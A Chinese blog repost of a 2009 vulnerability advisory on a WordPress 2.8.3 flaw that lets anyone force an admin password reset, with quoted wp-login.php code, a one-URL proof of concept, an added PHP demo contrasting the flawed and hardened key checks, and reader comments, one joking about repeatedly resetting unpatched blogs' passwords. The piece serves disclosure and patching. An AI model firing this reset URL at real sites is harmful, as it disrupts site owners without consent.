
WordPress 2.8.3 Remote Administrator Password Reset Vulnerability

      WordPress 2.8.3 has a vulnerability that lets wp-login.php be used to maliciously reset the administrator password. Unfortunately, the new password cannot be obtained directly after the reset; it is sent straight to the administrator's mailbox. If one could get hold of the administrator's mailbox, then...
      Reportedly, WP has already released a patch; WP users should upgrade promptly and overwrite the vulnerable file.
      Disclosure date: 2009-08-10
      Affected WordPress versions: WordPress 2.8.3 and earlier
      Attack method:
      Visit http://www.xxx.com/wp-login.php?action=lostpassword. WordPress sends an email to the administrator's mailbox saying, roughly, that someone has requested a reset of the administrator password, and includes a link. Clicking the link confirms the reset, and a second email containing the new password is then received.
      A harsher trick: visit http://www.xxx.com/wp-login.php?action=rp&key[]= and WordPress forces a password reset with no confirmation from the administrator. Of course, the reset password is still sent to the administrator's mailbox.

      Read on for the details.

=============================================
– Release date: August 10th, 2009
– Discovered by: Laurent Gaffié
– Severity: Medium
=============================================

I. VULNERABILITY
————————-
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
————————-
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.

III. DESCRIPTION
————————-
The way WordPress handles a password reset looks like this:
You submit your email address or username via the form /wp-login.php?action=lostpassword ;
WordPress sends you a reset confirmation like this via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just
ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, WordPress resets your admin password, and
sends you another email with your new credentials.

Let's see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
…[snip]….

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

break;
…[snip ]…

You can abuse the password reset function, bypass the first step and
then reset the admin password by submitting an array to the $key
variable.
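As an added illustration, not code from the advisory or from WordPress itself, the following PHP script models the key check of reset_password() quoted above, shows why a key submitted as an array survives it, and places beside it a hardened check that rejects non-string input (WordPress 2.8.4 closed the hole with an is_array() test to the same effect).

```php
<?php
// Added example, not code from the advisory or from WordPress. It models the
// key validation of reset_password() and a hardened variant side by side.

// Vulnerable check, as quoted from wp-login.php in the advisory.
// preg_replace() applied to an array returns an array, and empty() is false
// for a one-element array, so key[]= passes through as array('').
function validate_key_vulnerable($key)
{
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if (empty($key)) {
        return false;
    }
    // May be an array here. An array handed to $wpdb->prepare() as its only
    // argument is unpacked as the argument list, so the lookup becomes
    // user_activation_key = '' and matches accounts with no pending reset.
    return $key;
}

// Hardened check: only a non-empty alphanumeric string is accepted, so the
// %s placeholder can never receive an array.
function validate_key_hardened($key)
{
    if (!is_string($key)) {
        return false;
    }
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ($key === '') {
        return false;
    }
    return $key;
}

// Constructed query strings, as wp-login.php would see them in $_GET.
$cases = array(
    'action=rp&key=o7naCKN3OoeU2KJMMsag', // key from a legitimate reset email
    'action=rp&key=',                     // empty key
    'action=rp&key[]=',                   // the advisory's proof of concept
);

foreach ($cases as $qs) {
    parse_str($qs, $params);
    printf("%-38s vulnerable: %-24s hardened: %s\n",
        $qs,
        json_encode(validate_key_vulnerable($params['key'])),
        json_encode(validate_key_hardened($params['key'])));
}
```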

IV. PROOF OF CONCEPT
————————-
A web browser is sufficient to reproduce this proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
————————-
An attacker could exploit this vulnerability to compromise the admin
account of any WordPress/WordPress MU <= 2.8.3 installation.

VI. SYSTEMS AFFECTED
————————-
All

VII. SOLUTION
————————-
No patch available for the moment.

VIII. REFERENCES
————————-
http://www.wordpress.org

IX. CREDITS
————————-
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for their great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
————————-
August 10th, 2009: Initial release

XI. LEGAL NOTICES
————————-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

# milw0rm.com [2009-08-11]

Please respect copyright when reposting. Source: 秋天博客
Permalink: https://www.cfresh.net/web-security/115

  1. 0point
    0point August 15th, 2009 @ 08:58 | #-31

    @海天无影
    I haven't paid much attention either; we're all law-abiding citizens of the Republic.

  2. 海天无影
    海天无影 August 15th, 2009 @ 08:57 | #-32

    Heh, I saw it but didn't pay much attention~

  3. 0point
    0point August 14th, 2009 @ 08:45 | #-33

    @虾
    虾, you flatter me. I didn't discover this vulnerability; I just reposted it from a foreign vulnerability site and translated the main points at the top.
    @真好网
    The patch and update for this vulnerability are out now; anyone using WP should go download it.
    @Tony
    I've started tinkering with WP too. I downloaded WP 2.8.4 yesterday, but got stuck debugging phpMyAdmin under IIS. PJ's features still aren't as powerful as WP's.

  4. TONY
    TONY August 14th, 2009 @ 01:46 | #-34

    Not switching for now, just playing around with it! Getting familiar with it first! I think this PJ will have to be replaced sooner or later!

  5. 真好网
    真好网 August 13th, 2009 @ 23:16 | #-35

    Vulnerabilities are sometimes unavoidable; I just hope it gets fixed quickly.

  6. 虾
    August 13th, 2009 @ 18:01 | #-36

    I read the text above carefully. Good thing mine is 2.7. But once I got to the code below I was lost, so lost I don't know what to say. You're really deep; very detailed, very professional knowledge.

  7. 0point
    0point August 13th, 2009 @ 13:38 | #-37

    @卢松松
    I don't use WP; I use PJ on the ASP platform, heh.
    @阿士
    I've been studying WP lately; when conditions are right I may consider switching platforms.

  8. 阿士
    阿士 August 13th, 2009 @ 12:06 | #-38

    Playing with WP is too tiring; you have to look up so much material in English, so I gave up.

  9. 卢松松
    卢松松 August 13th, 2009 @ 11:08 | #-39

    2.8.4 came out today; hurry up and update.

  10. 0point
    0point August 13th, 2009 @ 09:47 | #-40

    @世纪之光
    It's not that I'm cutting-edge; it's that there are plenty of people researching WP vulnerabilities, haha.

  11. 世纪之光
    世纪之光 August 13th, 2009 @ 09:36 | #-41

    You really are cutting-edge: such a new version, and the vulnerability came out this fast.

  12. 0point
    0point August 13th, 2009 @ 08:46 | #-42

    @笔头
    But it can be used to mess with people: as long as they don't patch, keep at it, resetting the password over and over until they break down, haha.
    @tony
    Are you switching blog software?

  13. tony
    tony August 12th, 2009 @ 19:53 | #-43

    I'm working on a WP blog right now.

  14. 笔头
    笔头 August 12th, 2009 @ 18:10 | #-44

    Still can't see the password~
